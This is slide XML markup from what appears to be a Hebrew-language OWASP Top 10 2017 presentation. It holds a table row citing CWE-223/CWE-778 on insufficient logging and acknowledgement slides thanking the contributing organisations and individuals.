                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>493</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="199063">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תיעוד וניטור בלתי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מספקים </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[CWE-223 / CWE-778]</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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900" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>440</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="28438" marR="28438" marT="18958" marB="18958" anchor="b">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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353279024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8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0"/>
              <a:t>+ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>תודות</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3353083669"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8166478"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370123">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>תודות לארגונים שתרמו מידע</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3252951">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he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אנו רוצים להודות לארגונים הרבים אשר תרמו</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מידע לגבי הפגיעויות שלהם לטובת תמיכה במהדורה של 2017:</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab pos="266700" algn="l"/>
                          <a:tab pos="361950" algn="l"/>
                          <a:tab pos="1885950" algn="l"/>
                          <a:tab pos="1971675" algn="l"/>
                          <a:tab pos="3409950" algn="l"/>
                          <a:tab pos="3495675" algn="l"/>
                          <a:tab pos="4933950" algn="l"/>
                          <a:tab pos="5019675" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1800" u="none" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בפעם הראשונה, כל המידע שנתרם למהדורת עשרת הפגיעויות, ורשימת התורמים המלאה </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>זמינים בצורה פומבית</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="367644">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he-IL" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:uLnTx/>
                          <a:uFillTx/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>תודות לתורמים פרטיים</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="2608774898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4162682">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he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אנו מעוניינים להודות לתורמים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הפרטיים אשר השקיעו יחד שעות רבות על-מנת לתרום לרשימת עשרת הפגיעויות ב-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans"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cs typeface="Liberation Sans"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cs typeface="Liberation Sans"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950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="92D050"/>
                        </a:solidFill>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950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="92D050"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans"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i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans"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500" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans"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i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans"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950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>וכל אחד אחר</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> אשר סיפק משוב באמצעות </a:t>
                      </a:r>
